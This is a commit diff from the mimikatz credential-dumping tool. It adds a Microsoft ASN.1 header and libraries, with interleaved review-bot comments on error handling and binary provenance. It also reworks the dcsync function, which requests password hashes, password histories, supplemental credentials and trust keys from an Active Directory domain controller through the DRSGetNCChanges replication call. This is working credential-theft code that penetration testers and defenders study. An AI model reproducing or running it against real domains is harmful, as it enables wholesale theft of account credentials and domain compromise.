[internal] ASN.1 OID encode/decode

[internal] MS-DRSR with OID instead of standard ATT only
[internal] MS-DRSR function IDL_DRSAddEntry
Benjamin DELPY 2017-01-07 03:45:34 +01:00
parent d8ee9e20ca
commit ea674c5073
14 changed files with 3182 additions and 409 deletions

inc/msasn1.h Normal file

@ -0,0 +1,987 @@
/* Copyright (C) Boris Nikolaus, Germany, 1996-1997. All rights reserved. */
/* Copyright (C) Microsoft Corporation 1997-1998, All rights reserved. */
#ifndef __MS_ASN1_H__
#define __MS_ASN1_H__
#include <pshpack8.h> /* Assume 8 byte packing throughout */
#ifdef __cplusplus
extern "C" {
#endif
/* ------ Basic integer types ------ */
typedef unsigned char ASN1uint8_t;
typedef signed char ASN1int8_t;
typedef unsigned short ASN1uint16_t;
typedef signed short ASN1int16_t;
typedef unsigned long ASN1uint32_t;
typedef signed long ASN1int32_t;
/* ------ Function modifiers ------ */
#ifdef ASN1LIB
#define ASN1_PUBLIC
#elif defined(ASN1C)
#define ASN1_PUBLIC
#else
#define ASN1_PUBLIC __declspec(dllimport)
#endif
#define ASN1API __stdcall
#define ASN1CALL __stdcall
#ifdef _M_CEE_PURE
#define ASN1API_INLINE __clrcall
#else
#define ASN1API_INLINE ASN1API
#endif
/* ------ Basic ASN.1 types ------ */
typedef ASN1uint8_t ASN1octet_t;
typedef ASN1uint8_t ASN1bool_t;
typedef struct tagASN1intx_t
{
ASN1uint32_t length;
__field_bcount(length)
ASN1octet_t *value;
}
ASN1intx_t;
typedef struct tagASN1octetstring_t
{
ASN1uint32_t length;
__field_bcount(length)
ASN1octet_t *value;
}
ASN1octetstring_t;
typedef struct tagASN1octetstring2_t
{
ASN1uint32_t length;
ASN1octet_t value[1];
}
ASN1octetstring2_t;
typedef struct ASN1iterator_s
{
struct ASN1iterator_s *next;
void *value;
}
ASN1iterator_t;
typedef struct tagASN1bitstring_t
{
ASN1uint32_t length;
__field_bcount(length)
ASN1octet_t *value;
}
ASN1bitstring_t;
typedef char ASN1char_t;
typedef struct tagASN1charstring_t
{
ASN1uint32_t length;
__field_ecount(length)
ASN1char_t *value;
}
ASN1charstring_t;
typedef ASN1uint16_t ASN1char16_t;
typedef struct tagASN1char16string_t
{
ASN1uint32_t length;
__field_ecount(length)
ASN1char16_t *value;
}
ASN1char16string_t;
typedef ASN1uint32_t ASN1char32_t;
typedef struct tagASN1char32string_t
{
ASN1uint32_t length;
__field_ecount(length)
ASN1char32_t *value;
}
ASN1char32string_t;
typedef ASN1char_t *ASN1ztcharstring_t;
typedef ASN1char16_t *ASN1ztchar16string_t;
typedef ASN1char32_t *ASN1ztchar32string_t;
typedef struct tagASN1wstring_t
{
ASN1uint32_t length;
__field_ecount(length)
WCHAR *value;
}
ASN1wstring_t;
typedef struct ASN1objectidentifier_s
{
struct ASN1objectidentifier_s *next;
ASN1uint32_t value;
}
*ASN1objectidentifier_t;
typedef struct tagASN1objectidentifier2_t
{
__range(0, 16)
ASN1uint16_t count;
ASN1uint32_t value[16];
}
ASN1objectidentifier2_t;
typedef struct tagASN1encodedOID_t
{
ASN1uint16_t length;
__field_bcount(length)
ASN1octet_t *value;
}
ASN1encodedOID_t;
typedef ASN1ztcharstring_t ASN1objectdescriptor_t;
typedef struct tagASN1generalizedtime_t
{
ASN1uint16_t year;
ASN1uint8_t month;
ASN1uint8_t day;
ASN1uint8_t hour;
ASN1uint8_t minute;
ASN1uint8_t second;
ASN1uint16_t millisecond;
ASN1bool_t universal;
ASN1int16_t diff;
}
ASN1generalizedtime_t;
typedef struct tagASN1utctime_t
{
ASN1uint8_t year;
ASN1uint8_t month;
ASN1uint8_t day;
ASN1uint8_t hour;
ASN1uint8_t minute;
ASN1uint8_t second;
ASN1bool_t universal;
ASN1int16_t diff;
}
ASN1utctime_t;
typedef struct tagASN1open_t
{
// encoded
ASN1uint32_t length;
union
{
__field_bcount(length)
void *encoded;
__field_bcount(length)
void *value;
};
}
ASN1open_t;
typedef enum tagASN1blocktype_e
{
ASN1_DER_SET_OF_BLOCK,
}
ASN1blocktype_e;
typedef ASN1int32_t ASN1enum_t; // enumerated type
typedef ASN1uint16_t ASN1choice_t; // choice
typedef ASN1uint32_t ASN1magic_t;
/* ------ Current version of this ASN.1 software ------ */
#define ASN1_MAKE_VERSION(major,minor) (((major) << 16) | (minor))
#define ASN1_THIS_VERSION ASN1_MAKE_VERSION(1,0)
enum
{
ASN1_CHOICE_BASE = 1,
ASN1_CHOICE_INVALID = -1, // invalid choice
ASN1_CHOICE_EXTENSION = 0, // extension choice
};
/*
Error codes for decoding functions:
- err == 0: data has been successfully decoded
- err < 0: fatal error has occured, no data has been generated
err contains the error number
- err > 0: non-fatal event has occured, data has been generated
err is a bit set of occured events
*/
typedef enum tagASN1error_e
{
ASN1_SUCCESS = 0, /* success */
// Teles specific error codes
ASN1_ERR_INTERNAL = (-1001), /* internal error */
ASN1_ERR_EOD = (-1002), /* unexpected end of data */
ASN1_ERR_CORRUPT = (-1003), /* corrupted data */
ASN1_ERR_LARGE = (-1004), /* value too large */
ASN1_ERR_CONSTRAINT = (-1005), /* constraint violated */
ASN1_ERR_MEMORY = (-1006), /* out of memory */
ASN1_ERR_OVERFLOW = (-1007), /* buffer overflow */
ASN1_ERR_BADPDU = (-1008), /* function not supported for this pdu*/
ASN1_ERR_BADARGS = (-1009), /* bad arguments to function call */
ASN1_ERR_BADREAL = (-1010), /* bad real value */
ASN1_ERR_BADTAG = (-1011), /* bad tag value met */
ASN1_ERR_CHOICE = (-1012), /* bad choice value */
ASN1_ERR_RULE = (-1013), /* bad encoding rule */
ASN1_ERR_UTF8 = (-1014), /* bad unicode (utf8) */
// New error codes
ASN1_ERR_PDU_TYPE = (-1051), /* bad pdu type */
ASN1_ERR_NYI = (-1052), /* not yet implemented */
// Teles specific warning codes
ASN1_WRN_EXTENDED = 1001, /* skipped unknown extension(s) */
ASN1_WRN_NOEOD = 1002, /* end of data expected */
}
ASN1error_e;
#define ASN1_SUCCEEDED(ret) (((int) (ret)) >= 0)
#define ASN1_FAILED(ret) (((int) (ret)) < 0)
/* ------ Encoding rules ------ */
typedef enum
{
ASN1_BER_RULE_BER = 0x0100,
ASN1_BER_RULE_CER = 0x0200,
ASN1_BER_RULE_DER = 0x0400,
ASN1_BER_RULE = ASN1_BER_RULE_BER | ASN1_BER_RULE_CER | ASN1_BER_RULE_DER,
}
ASN1encodingrule_e;
/* ------ public structures ------ */
typedef struct ASN1encoding_s *ASN1encoding_t;
typedef struct ASN1decoding_s *ASN1decoding_t;
typedef ASN1int32_t (ASN1CALL *ASN1BerEncFun_t)( __in ASN1encoding_t enc, ASN1uint32_t tag, __in void *data);
typedef ASN1int32_t (ASN1CALL *ASN1BerDecFun_t)( __in ASN1decoding_t enc, ASN1uint32_t tag, __out void *data);
typedef struct tagASN1BerFunArr_t
{
const ASN1BerEncFun_t *apfnEncoder;
const ASN1BerDecFun_t *apfnDecoder;
}
ASN1BerFunArr_t;
typedef void (ASN1CALL *ASN1GenericFun_t)(void);
typedef void (ASN1CALL *ASN1FreeFun_t)( __in void *data);
typedef struct tagASN1module_t
{
ASN1magic_t nModuleName;
ASN1encodingrule_e eRule;
ASN1uint32_t dwFlags;
ASN1uint32_t cPDUs;
__field_xcount(cPDUs)
const ASN1FreeFun_t *apfnFreeMemory;
__field_xcount(cPDUs)
const ASN1uint32_t *acbStructSize;
ASN1BerFunArr_t BER;
}
*ASN1module_t;
struct ASN1encoding_s
{
ASN1magic_t magic; /* magic for this structure */
ASN1uint32_t version;/* version number of this library */
ASN1module_t module; /* module this encoding_t depends to */
__field_bcount(size)
ASN1octet_t *buf; /* buffer to encode into */
ASN1uint32_t size; /* current size of buffer */
ASN1uint32_t len; /* len of encoded data in buffer */
ASN1error_e err; /* error code for last encoding */
ASN1uint32_t bit;
ASN1octet_t *pos;
ASN1uint32_t cbExtraHeader;
ASN1encodingrule_e eRule;
ASN1uint32_t dwFlags;
};
struct ASN1decoding_s
{
ASN1magic_t magic; /* magic for this structure */
ASN1uint32_t version;/* version number of this library */
ASN1module_t module; /* module this decoding_t depends to */
__field_bcount(size)
ASN1octet_t *buf; /* buffer to decode from */
ASN1uint32_t size; /* size of buffer */
ASN1uint32_t len; /* len of decoded data in buffer */
ASN1error_e err; /* error code for last decoding */
ASN1uint32_t bit;
ASN1octet_t *pos;
ASN1encodingrule_e eRule;
ASN1uint32_t dwFlags;
};
/* --- flags for functions --- */
#define ASN1DECFREE_NON_PDU_ID ((ASN1uint32_t) -1)
enum
{
ASN1FLAGS_NONE = 0x00000000L, /* no flags */
ASN1FLAGS_NOASSERT = 0x00001000L, /* no asertion */
};
enum
{
ASN1ENCODE_APPEND = 0x00000001L, /* append to current buffer*/
ASN1ENCODE_REUSEBUFFER = 0x00000004L, /* empty destination buffer */
ASN1ENCODE_SETBUFFER = 0x00000008L, /* use a user-given destination buffer */
ASN1ENCODE_ALLOCATEBUFFER = 0x00000010L, /* do not free/reuse buffer */
ASN1ENCODE_NOASSERT = ASN1FLAGS_NOASSERT, /* no asertion */
};
enum
{
ASN1DECODE_APPENDED = 0x00000001L, /* continue behind last pdu*/
ASN1DECODE_REWINDBUFFER = 0x00000004L, /* rescan from buffer start*/
ASN1DECODE_SETBUFFER = 0x00000008L, /* use a user-given src buffer */
ASN1DECODE_AUTOFREEBUFFER = 0x00000010L, /* Assume responsibility for allocated buffer */
ASN1DECODE_NOASSERT = ASN1FLAGS_NOASSERT, /* no asertion */
};
/*****************************************************************************
ASN1_CreateModule
*****************************************************************************/
extern ASN1_PUBLIC
ASN1module_t
ASN1API
ASN1_CreateModule(
ASN1uint32_t nVersion,
ASN1encodingrule_e eRule,
ASN1uint32_t dwFlags, /* ASN1FLAGS_NONE or ASN1FLAGS_NOASSERT */
ASN1uint32_t cPDU,
const ASN1GenericFun_t apfnEncoder[],
const ASN1GenericFun_t apfnDecoder[],
const ASN1FreeFun_t apfnFreeMemory[],
const ASN1uint32_t acbStructSize[],
ASN1magic_t nModuleName
);
/*****************************************************************************
ASN1_CloseModule
*****************************************************************************/
extern ASN1_PUBLIC
void
ASN1API
ASN1_CloseModule(
__in ASN1module_t pModule
);
/*****************************************************************************
ASN1_CreateEncoder
*****************************************************************************/
extern ASN1_PUBLIC
__success( return >= 0 )
ASN1error_e
ASN1API
ASN1_CreateEncoder(
__in ASN1module_t pModule,
__deref_out ASN1encoding_t *ppEncoderInfo,
__in_bcount_opt( cbBufSize )
ASN1octet_t *pbBuf,
ASN1uint32_t cbBufSize,
__in_opt ASN1encoding_t pParent
);
/*****************************************************************************
ASN1_Encode
*****************************************************************************/
extern ASN1_PUBLIC
__success( return >= 0 )
ASN1error_e
ASN1API
ASN1_Encode(
__in ASN1encoding_t pEncoderInfo,
__in void *pDataStruct,
ASN1uint32_t nPduNum,
ASN1uint32_t dwFlags,
__out_bcount_opt( cbBufSize )
ASN1octet_t *pbBuf,
ASN1uint32_t cbBufSize
);
/*****************************************************************************
ASN1_CloseEncoder
*****************************************************************************/
extern ASN1_PUBLIC
void
ASN1API
ASN1_CloseEncoder(
__in ASN1encoding_t pEncoderInfo
);
/*****************************************************************************
ASN1_CloseEncoder2
*****************************************************************************/
extern ASN1_PUBLIC
void
ASN1API
ASN1_CloseEncoder2(
__in ASN1encoding_t pEncoderInfo
);
/*****************************************************************************
ASN1_CreateDecoder
*****************************************************************************/
extern ASN1_PUBLIC
__success( return >= 0 )
ASN1error_e
ASN1API
ASN1_CreateDecoder(
__in ASN1module_t pModule,
__deref_out ASN1decoding_t *ppDecoderInfo,
__in_bcount_opt(cbBufSize)
ASN1octet_t *pbBuf,
ASN1uint32_t cbBufSize,
__in_opt ASN1decoding_t pParent
);
/*****************************************************************************
ASN1_CreateDecoderEx
*****************************************************************************/
extern ASN1_PUBLIC
__success( return >= 0 )
ASN1error_e
ASN1API
ASN1_CreateDecoderEx(
__in ASN1module_t pModule,
__deref_out ASN1decoding_t *ppDecoderInfo,
__in_bcount_opt(cbBufSize)
ASN1octet_t *pbBuf,
ASN1uint32_t cbBufSize,
__in_opt ASN1decoding_t pParent,
ASN1uint32_t dwFlags
);
/*****************************************************************************
ASN1_Decode
*****************************************************************************/
extern ASN1_PUBLIC
__success( return >= 0 )
ASN1error_e
ASN1API
ASN1_Decode(
__in ASN1decoding_t pDecoderInfo,
__deref_out void **ppDataStruct,
ASN1uint32_t nPduNum,
ASN1uint32_t dwFlags,
__in_bcount(cbBufSize)
ASN1octet_t *pbBuf,
ASN1uint32_t cbBufSize
);
/*****************************************************************************
ASN1_CloseDecoder
*****************************************************************************/
extern ASN1_PUBLIC
void
ASN1API
ASN1_CloseDecoder(
__in ASN1decoding_t pDecoderInfo
);
/*****************************************************************************
ASN1_FreeEncoded
*****************************************************************************/
extern ASN1_PUBLIC
void
ASN1API
ASN1_FreeEncoded(
__in ASN1encoding_t pEncoderInfo,
__in void *pBuf
);
/*****************************************************************************
ASN1_FreeDecoded
*****************************************************************************/
extern
ASN1_PUBLIC
void
ASN1API
ASN1_FreeDecoded(
__in ASN1decoding_t pDecoderInfo,
__in void *pDataStruct,
ASN1uint32_t nPduNum
);
/*****************************************************************************
Options
*****************************************************************************/
typedef enum
{
// common set option
ASN1OPT_CHANGE_RULE = 0x101,
// common get option
ASN1OPT_GET_RULE = 0x201,
// set encoder option
ASN1OPT_NOT_REUSE_BUFFER = 0x301,
ASN1OPT_REWIND_BUFFER = 0x302,
// get encoder option
// set decoder option
ASN1OPT_SET_DECODED_BUFFER = 0x501,
ASN1OPT_DEL_DECODED_BUFFER = 0x502,
// get decoder option
ASN1OPT_GET_DECODED_BUFFER_SIZE = 0x601,
}
ASN1option_e;
typedef struct tagASN1optionparam_t
{
ASN1option_e eOption;
union
{
ASN1encodingrule_e eRule;
ASN1uint32_t cbRequiredDecodedBufSize;
struct
{
ASN1octet_t *pbBuf;
ASN1uint32_t cbBufSize;
} Buffer;
};
}
ASN1optionparam_t, ASN1optionparam_s;
/*****************************************************************************
ASN1_SetEncoderOption
*****************************************************************************/
extern ASN1_PUBLIC
__success( return >= 0 )
ASN1error_e
ASN1API
ASN1_SetEncoderOption(
__in ASN1encoding_t pEncoderInfo,
__in ASN1optionparam_t *pOptParam
);
/*****************************************************************************
ASN1_GetEncoderOption
*****************************************************************************/
extern ASN1_PUBLIC
__success( return >= 0 )
ASN1error_e
ASN1API
ASN1_GetEncoderOption(
__in ASN1encoding_t pEncoderInfo,
__inout ASN1optionparam_t *pOptParam
);
/*****************************************************************************
ASN1_SetDecoderOption
*****************************************************************************/
extern ASN1_PUBLIC
__success( return >= 0 )
ASN1error_e
ASN1API
ASN1_SetDecoderOption(
__in ASN1decoding_t pDecoderInfo,
__in ASN1optionparam_t *pOptParam
);
/*****************************************************************************
ASN1_GetDecoderOption
*****************************************************************************/
extern ASN1_PUBLIC
__success( return >= 0 )
ASN1error_e
ASN1API
ASN1_GetDecoderOption(
__in ASN1decoding_t pDecoderInfo,
__inout ASN1optionparam_t *pOptParam
);
/*****************************************************************************
XXX_free
*****************************************************************************/
extern ASN1_PUBLIC
void
ASN1API
ASN1bitstring_free(
__in ASN1bitstring_t *
);
extern ASN1_PUBLIC
void
ASN1API
ASN1octetstring_free(
__in ASN1octetstring_t *
);
extern ASN1_PUBLIC
void
ASN1API
ASN1objectidentifier_free(
__in ASN1objectidentifier_t *
);
extern ASN1_PUBLIC
void
ASN1API
ASN1charstring_free(
__in ASN1charstring_t *
);
extern ASN1_PUBLIC
void
ASN1API
ASN1char16string_free(
__in ASN1char16string_t *
);
extern ASN1_PUBLIC
void
ASN1API
ASN1char32string_free(
__in ASN1char32string_t *
);
extern ASN1_PUBLIC
void
ASN1API
ASN1ztcharstring_free(
__in ASN1ztcharstring_t
);
extern ASN1_PUBLIC
void
ASN1API
ASN1ztchar16string_free(
__in ASN1ztchar16string_t
);
extern ASN1_PUBLIC
void
ASN1API
ASN1ztchar32string_free(
__in ASN1ztchar32string_t
);
extern ASN1_PUBLIC
void
ASN1API
ASN1open_free(
__in ASN1open_t *
);
extern ASN1_PUBLIC
void
ASN1API
ASN1utf8string_free(
__in ASN1wstring_t *
);
/*****************************************************************************
ASN1DecAlloc
*****************************************************************************/
extern ASN1_PUBLIC
__out_bcount_opt( size )
LPVOID
ASN1API
ASN1DecAlloc(
__in ASN1decoding_t dec,
ASN1uint32_t size
);
/*****************************************************************************
ASN1DecRealloc
*****************************************************************************/
extern ASN1_PUBLIC
__out_bcount_opt( size )
LPVOID
ASN1API
ASN1DecRealloc(
__in ASN1decoding_t dec,
__in LPVOID ptr,
ASN1uint32_t size
);
/*****************************************************************************
ASN1Free
*****************************************************************************/
extern ASN1_PUBLIC
void
ASN1API
ASN1Free(
__in LPVOID ptr
);
/*****************************************************************************
ASN1EncSetError
*****************************************************************************/
extern ASN1_PUBLIC
__success( return >= 0 )
ASN1error_e
ASN1API ASN1EncSetError(
__in ASN1encoding_t enc,
ASN1error_e err
);
/*****************************************************************************
ASN1EncSetError
*****************************************************************************/
extern ASN1_PUBLIC
__success( return >= 0 )
ASN1error_e
ASN1API
ASN1DecSetError(
__in ASN1decoding_t dec,
ASN1error_e err
);
/*****************************************************************************
intx conversions
*****************************************************************************/
extern ASN1_PUBLIC
ASN1uint32_t
ASN1API
ASN1intx_uoctets(
__in ASN1intx_t *
);
extern ASN1_PUBLIC
void
ASN1API
ASN1intx_free(
__in ASN1intx_t *
);
extern ASN1_PUBLIC
ASN1int32_t
ASN1API
ASN1intx2int32(
__in ASN1intx_t *
);
extern ASN1_PUBLIC
ASN1uint32_t
ASN1API
ASN1intx2uint32(
__in ASN1intx_t *
);
extern ASN1_PUBLIC
int
ASN1API
ASN1intxisuint32(
__in ASN1intx_t *
);
extern ASN1_PUBLIC
void
ASN1API
ASN1intx_setuint32(
__out ASN1intx_t *dst,
ASN1uint32_t val
);
/*****************************************************************************
ASN1uint32_uoctets
count octets for unsigned encoding of an uint32 value
*****************************************************************************/
extern ASN1_PUBLIC
ASN1uint32_t
ASN1API
ASN1uint32_uoctets(
ASN1uint32_t
);
/*****************************************************************************
Comparisson APIs
*****************************************************************************/
extern ASN1_PUBLIC
int
ASN1API
ASN1intx_cmp(
__in ASN1intx_t *,
__in ASN1intx_t *
);
extern ASN1_PUBLIC
int
ASN1API
ASN1objectidentifier_cmp(
__in ASN1objectidentifier_t *,
__in ASN1objectidentifier_t *
);
extern ASN1_PUBLIC
int
ASN1API
ASN1objectidentifier2_cmp(
__in ASN1objectidentifier2_t *,
__in ASN1objectidentifier2_t *
);
extern ASN1_PUBLIC
int
ASN1API
ASN1bitstring_cmp(
__in ASN1bitstring_t *,
__in ASN1bitstring_t *,
int
);
extern ASN1_PUBLIC
int
ASN1API
ASN1octetstring_cmp(
__in ASN1octetstring_t *,
__in ASN1octetstring_t *
);
extern ASN1_PUBLIC
int
ASN1API
ASN1charstring_cmp(
__in ASN1charstring_t *,
__in ASN1charstring_t *
);
extern ASN1_PUBLIC
int
ASN1API
ASN1char16string_cmp(
__in ASN1char16string_t *,
__in ASN1char16string_t *
);
extern ASN1_PUBLIC
int
ASN1API
ASN1char32string_cmp(
__in ASN1char32string_t *,
__in ASN1char32string_t *
);
extern ASN1_PUBLIC
int
ASN1API
ASN1ztcharstring_cmp(
__in_z ASN1ztcharstring_t,
__in_z ASN1ztcharstring_t
);
extern ASN1_PUBLIC
int
ASN1API
ASN1ztchar16string_cmp(
__in_z ASN1ztchar16string_t,
__in_z ASN1ztchar16string_t
);
extern ASN1_PUBLIC
int
ASN1API
ASN1ztchar32string_cmp(
__in_z ASN1ztchar32string_t,
__in_z ASN1ztchar32string_t
);
extern ASN1_PUBLIC
int
ASN1API
ASN1open_cmp(
__in ASN1open_t *,
__in ASN1open_t *
);
extern ASN1_PUBLIC
int
ASN1API
ASN1generalizedtime_cmp(
__in ASN1generalizedtime_t *,
__in ASN1generalizedtime_t *
);
extern ASN1_PUBLIC
int
ASN1API
ASN1utctime_cmp(
__in ASN1utctime_t *,
__in ASN1utctime_t *
);
#ifdef __cplusplus
}
#endif
#include <poppack.h> /* End 8-byte packing */
#endif // __MS_ASN1_H__

lib/Win32/msasn1.min.lib Normal file

Binary file not shown.

lib/x64/msasn1.min.lib Normal file

Binary file not shown.


@ -15,6 +15,7 @@ Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "inc", "inc", "{282B4B77-BFF
inc\DsGetDC.h = inc\DsGetDC.h
inc\globals.h = inc\globals.h
inc\Midles.h = inc\Midles.h
inc\msasn1.h = inc\msasn1.h
inc\NTSecPKG.h = inc\NTSecPKG.h
inc\PshPack8.h = inc\PshPack8.h
inc\schannel.h = inc\schannel.h
@ -32,6 +33,7 @@ Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Win32", "Win32", "{96078881
lib\Win32\advapi32.hash.lib = lib\Win32\advapi32.hash.lib
lib\Win32\cryptdll.lib = lib\Win32\cryptdll.lib
lib\Win32\hid.lib = lib\Win32\hid.lib
lib\Win32\msasn1.min.lib = lib\Win32\msasn1.min.lib
lib\Win32\netapi32.min.lib = lib\Win32\netapi32.min.lib
lib\Win32\ntdll.min.lib = lib\Win32\ntdll.min.lib
lib\Win32\samlib.lib = lib\Win32\samlib.lib
@ -42,6 +44,7 @@ Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "x64", "x64", "{E9D1619F-D4A
lib\x64\advapi32.hash.lib = lib\x64\advapi32.hash.lib
lib\x64\cryptdll.lib = lib\x64\cryptdll.lib
lib\x64\hid.lib = lib\x64\hid.lib
lib\x64\msasn1.min.lib = lib\x64\msasn1.min.lib
lib\x64\netapi32.min.lib = lib\x64\netapi32.min.lib
lib\x64\ntdll.min.lib = lib\x64\ntdll.min.lib
lib\x64\samlib.lib = lib\x64\samlib.lib


@ -98,6 +98,7 @@ NTSTATUS mimikatz_initOrClean(BOOL Init)
hr = CoInitializeEx(NULL, COINIT_MULTITHREADED);
if(FAILED(hr))
PRINT_ERROR(L"CoInitializeEx: %08x\n", hr);
kull_m_asn1_init();
}
else
offsetToFunc = FIELD_OFFSET(KUHL_M, pClean);
@ -114,6 +115,7 @@ NTSTATUS mimikatz_initOrClean(BOOL Init)
if(!Init)
{
kull_m_asn1_term();
CoUninitialize();
kull_m_output_file(NULL);
}
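Review bot: The added `kull_m_asn1_init();` call in the `Init` branch discards whatever the function reports, so a failed ASN.1 module setup would go unnoticed and later OID encode/decode calls would presumably run against an uninitialised module. Its prototype is not visible on this page; if it returns a status, handle it like the `CoInitializeEx` result just above, e.g. `if(!kull_m_asn1_init()) PRINT_ERROR(L"kull_m_asn1_init\n");`. The teardown in the second hunk (`kull_m_asn1_term()` before `CoUninitialize()`) mirrors the init order, which is the right way round. `mimikatz_initOrClean` starts and ends outside both hunks.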


@ -78,7 +78,7 @@
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<AdditionalDependencies>advapi32.lib;crypt32.lib;cryptdll.lib;dnsapi.lib;msxml2.lib;netapi32.lib;ntdsapi.lib;ole32.lib;oleaut32.lib;rpcrt4.lib;shlwapi.lib;samlib.lib;secur32.lib;shell32.lib;user32.lib;hid.lib;setupapi.lib;winscard.lib;wldap32.lib;advapi32.hash.lib;ntdll.min.lib;netapi32.min.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalDependencies>advapi32.lib;crypt32.lib;cryptdll.lib;dnsapi.lib;msxml2.lib;netapi32.lib;ntdsapi.lib;ole32.lib;oleaut32.lib;rpcrt4.lib;shlwapi.lib;samlib.lib;secur32.lib;shell32.lib;user32.lib;hid.lib;setupapi.lib;winscard.lib;wldap32.lib;advapi32.hash.lib;msasn1.min.lib;ntdll.min.lib;netapi32.min.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AssemblyDebug>false</AssemblyDebug>
<DataExecutionPrevention>true</DataExecutionPrevention>
<LinkErrorReporting>NoErrorReport</LinkErrorReporting>
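Review bot: The new `msasn1.min.lib` entry in `AdditionalDependencies` links against a library that this commit adds only as a binary (`lib/Win32/msasn1.min.lib` and `lib/x64/msasn1.min.lib`, both "Binary file not shown"), so what the linker pulls in cannot be reviewed from the diff. Record its provenance where the dependency is declared, for example `<!-- msasn1.min.lib: built from <PLACEHOLDER: .def file or generation command> -->`, or commit the source it is generated from so the library can be rebuilt and compared.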


@ -1677,6 +1677,15 @@ NTSTATUS kuhl_m_lsadump_rpdata(int argc, wchar_t * argv[])
/* This function `dcsync` was co-writed with
Vincent LE TOUX ( vincent.letoux@gmail.com / http://www.mysmartlogon.com )
*/
LPCSTR kuhl_m_lsadump_dcsync_oids[] = {
szOID_ANSI_name,
szOID_ANSI_sAMAccountName, szOID_ANSI_userPrincipalName, szOID_ANSI_sAMAccountType,
szOID_ANSI_userAccountControl, szOID_ANSI_accountExpires, szOID_ANSI_pwdLastSet,
szOID_ANSI_objectSid, szOID_ANSI_sIDHistory,
szOID_ANSI_unicodePwd, szOID_ANSI_ntPwdHistory, szOID_ANSI_dBCSPwd, szOID_ANSI_lmPwdHistory, szOID_ANSI_supplementalCredentials,
szOID_ANSI_trustPartner, szOID_ANSI_trustAuthIncoming, szOID_ANSI_trustAuthOutgoing,
//szOID_ANSI_currentValue,
};
NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
{
LSA_OBJECT_ATTRIBUTES objectAttributes = {0};
@ -1685,7 +1694,7 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
DRS_HANDLE hDrs = NULL;
DSNAME dsName = {0};
DRS_MSG_GETCHGREQ getChReq = {0};
DWORD dwOutVersion = 0;
DWORD dwOutVersion = 0, i;
DRS_MSG_GETCHGREPLY getChRep = {0};
ULONG drsStatus;
LPCWSTR szUser = NULL, szGuid = NULL, szDomain = NULL, szDc = NULL;
@ -1727,28 +1736,38 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
getChReq.V8.cMaxBytes = 0x00a00000; // 10M
getChReq.V8.ulExtendedOp = EXOP_REPL_OBJ;
RpcTryExcept
if(getChReq.V8.pPartialAttrSet = (PARTIAL_ATTR_VECTOR_V1_EXT *) MIDL_user_allocate(sizeof(PARTIAL_ATTR_VECTOR_V1_EXT) + sizeof(ATTRTYP) * (ARRAYSIZE(kuhl_m_lsadump_dcsync_oids) - 1)))
{
drsStatus = IDL_DRSGetNCChanges(hDrs, 8, &getChReq, &dwOutVersion, &getChRep);
if(drsStatus == 0)
getChReq.V8.pPartialAttrSet->dwVersion = 1;
getChReq.V8.pPartialAttrSet->dwReserved1 = 0;
getChReq.V8.pPartialAttrSet->cAttrs = ARRAYSIZE(kuhl_m_lsadump_dcsync_oids);
for(i = 0; i < getChReq.V8.pPartialAttrSet->cAttrs; i++)
kull_m_rpc_drsr_MakeAttid(&getChReq.V8.PrefixTableDest, kuhl_m_lsadump_dcsync_oids[i], &getChReq.V8.pPartialAttrSet->rgPartialAttr[i], TRUE);
RpcTryExcept
{
if((dwOutVersion == 6) && (getChRep.V6.cNumObjects == 1))
drsStatus = IDL_DRSGetNCChanges(hDrs, 8, &getChReq, &dwOutVersion, &getChRep);
if(drsStatus == 0)
{
if(kull_m_rpc_drsr_ProcessGetNCChangesReply(getChRep.V6.pObjects))
if((dwOutVersion == 6) && (getChRep.V6.cNumObjects == 1))
{
kuhl_m_lsadump_dcsync_descrObject(&getChRep.V6.pObjects[0].Entinf.AttrBlock, szDomain);
if(kull_m_rpc_drsr_ProcessGetNCChangesReply(&getChRep.V6.PrefixTableSrc, getChRep.V6.pObjects))
kuhl_m_lsadump_dcsync_descrObject(&getChRep.V6.PrefixTableSrc, &getChRep.V6.pObjects[0].Entinf.AttrBlock, szDomain);
else PRINT_ERROR(L"kull_m_rpc_drsr_ProcessGetNCChangesReply\n");
}
else PRINT_ERROR(L"kull_m_rpc_drsr_ProcessGetNCChangesReply\n");
else PRINT_ERROR(L"DRSGetNCChanges, invalid dwOutVersion (%u) and/or cNumObjects (%u)\n", dwOutVersion, getChRep.V6.cNumObjects);
kull_m_rpc_drsr_free_DRS_MSG_GETCHGREPLY_data(dwOutVersion, &getChRep);
}
else PRINT_ERROR(L"DRSGetNCChanges, invalid dwOutVersion (%u) and/or cNumObjects (%u)\n", dwOutVersion, getChRep.V6.cNumObjects);
kull_m_rpc_drsr_free_DRS_MSG_GETCHGREPLY_data(dwOutVersion, &getChRep);
else PRINT_ERROR(L"GetNCChanges: 0x%08x (%u)\n", drsStatus, drsStatus);
IDL_DRSUnbind(&hDrs);
}
else PRINT_ERROR(L"GetNCChanges: 0x%08x (%u)\n", drsStatus, drsStatus);
IDL_DRSUnbind(&hDrs);
RpcExcept(RPC_EXCEPTION)
PRINT_ERROR(L"RPC Exception 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
RpcEndExcept
kull_m_rpc_drsr_free_SCHEMA_PREFIX_TABLE_data(&getChReq.V8.PrefixTableDest);
MIDL_user_free(getChReq.V8.pPartialAttrSet);
}
RpcExcept(RPC_EXCEPTION)
PRINT_ERROR(L"RPC Exception 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
RpcEndExcept
}
}
kull_m_rpc_deleteBinding(&hBinding);
@ -1768,44 +1787,6 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
return STATUS_SUCCESS;
}
PVOID kuhl_m_lsadump_dcsync_findMonoAttr(ATTRBLOCK *attributes, ATTRTYP type, PVOID data, DWORD *size)
{
PVOID ptr = NULL;
DWORD i;
ATTR *attribut;
if(data)
*(PVOID *)data = NULL;
if(size)
*size = 0;
for(i = 0; i < attributes->attrCount; i++)
{
